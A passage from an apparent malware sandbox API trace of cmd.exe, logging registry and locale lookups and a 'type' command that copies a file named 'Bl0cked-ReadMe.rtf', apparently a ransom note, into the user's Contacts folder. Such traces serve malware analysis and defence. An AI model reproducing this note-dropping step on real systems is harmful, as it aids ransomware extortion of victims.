lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x40, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x0, lpData=0x24e748*=0x40, lpcbData=0x24e740*=0x1000) returned 0x2 [0218.057] RegCloseKey (hKey=0x40) returned 0x0 [0218.057] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e73c | out: phkResult=0x24e73c*=0x40) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x0, lpData=0x24e748*=0x40, lpcbData=0x24e740*=0x1000) returned 0x2 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x1, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x0, lpData=0x24e748*=0x1, lpcbData=0x24e740*=0x1000) returned 0x2 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x0, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x9, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x9, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x0, lpData=0x24e748*=0x9, lpcbData=0x24e740*=0x1000) returned 0x2 [0218.057] RegCloseKey (hKey=0x40) returned 0x0 [0218.057] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b4 [0218.057] srand (_Seed=0x5b8863b4) [0218.057] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf\"" [0218.057] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf\"" [0218.057] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.058] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0218.058] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0218.058] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.058] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0218.058] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0218.058] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0218.058] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0218.058] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0218.058] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0218.058] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0218.058] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0218.058] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0218.058] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0218.058] GetEnvironmentStringsW () returned 0x3b22b8* [0218.058] FreeEnvironmentStringsW (penv=0x3b22b8) returned 1 [0218.058] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.059] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0218.059] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0218.059] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0218.059] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0218.059] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0218.059] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0218.059] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0218.059] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0218.059] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0218.059] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f508 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.059] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f508, lpFilePart=0x24f504 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f504*="Desktop") returned 0x18 [0218.059] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0218.059] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f284 | out: lpFindFileData=0x24f284) returned 0x3afff8 [0218.059] FindClose (in: hFindFile=0x3afff8 | out: hFindFile=0x3afff8) returned 1 [0218.059] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f284 | out: lpFindFileData=0x24f284) returned 0x3afff8 [0218.060] FindClose (in: hFindFile=0x3afff8 | out: hFindFile=0x3afff8) returned 1 [0218.060] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f284 | out: lpFindFileData=0x24f284) returned 0x3afff8 [0218.060] FindClose (in: hFindFile=0x3afff8 | out: hFindFile=0x3afff8) returned 1 [0218.060] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0218.060] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0218.060] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0218.060] GetEnvironmentStringsW () returned 0x3b2ad8* [0218.060] FreeEnvironmentStringsW (penv=0x3b2ad8) returned 1 [0218.060] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.061] GetConsoleOutputCP () returned 0x1b5 [0218.061] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0218.061] GetUserDefaultLCID () returned 0x409 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ff4950, cchData=8 | out: lpLCData=":") returned 2 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f648, cchData=128 | out: lpLCData="0") returned 2 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f648, cchData=128 | out: lpLCData="0") returned 2 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f648, cchData=128 | out: lpLCData="1") returned 2 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ff4940, cchData=8 | out: lpLCData="/") returned 2 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ff4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ff4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ff4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ff4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ff4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ff4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ff4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ff4930, cchData=8 | out: lpLCData=".") returned 2 [0218.062] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ff4920, cchData=8 | out: lpLCData=",") returned 2 [0218.062] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0218.063] GetConsoleTitleW (in: lpConsoleTitle=0x3a08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.063] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0218.063] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0218.063] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0218.063] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0218.064] _wcsicmp (_String1="type", _String2=")") returned 75 [0218.064] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0218.064] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0218.064] _wcsicmp (_String1="IF", _String2="type") returned -11 [0218.064] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0218.064] _wcsicmp (_String1="REM", _String2="type") returned -2 [0218.064] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0218.067] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.067] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.068] GetFileType (hFile=0x7) returned 0x2 [0218.068] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0218.068] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f540 | out: lpMode=0x24f540) returned 1 [0218.068] _dup (_FileHandle=1) returned 3 [0218.068] _close (_FileHandle=1) returned 0 [0218.068] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0218.069] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\contacts\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x24f510, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0218.070] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0218.070] GetConsoleTitleW (in: lpConsoleTitle=0x24f340, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.070] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0218.070] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0218.070] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0218.070] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0218.071] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.071] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x24eea4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24eea4) returned 0x3a0e50 [0218.071] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0218.071] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0218.071] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0218.071] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24ddb0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0218.071] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0218.071] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.071] GetFileType (hFile=0x54) returned 0x1 [0218.072] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.072] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x24de08 | out: lpFileSizeHigh=0x24de08*=0x0) returned 0x1632 [0218.072] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.072] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.072] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.072] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.072] GetFileType (hFile=0x4c) returned 0x1 [0218.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.072] GetFileType (hFile=0x4c) returned 0x1 [0218.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.072] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] GetFileType (hFile=0x4c) returned 0x1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] GetFileType (hFile=0x4c) returned 0x1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] GetFileType (hFile=0x4c) returned 0x1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] GetFileType (hFile=0x4c) returned 0x1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] GetFileType (hFile=0x4c) returned 0x1 [0218.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.073] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.074] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.074] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] GetFileType (hFile=0x4c) returned 0x1 [0218.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.074] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.075] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.075] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] GetFileType (hFile=0x4c) returned 0x1 [0218.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.075] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.076] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.076] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) 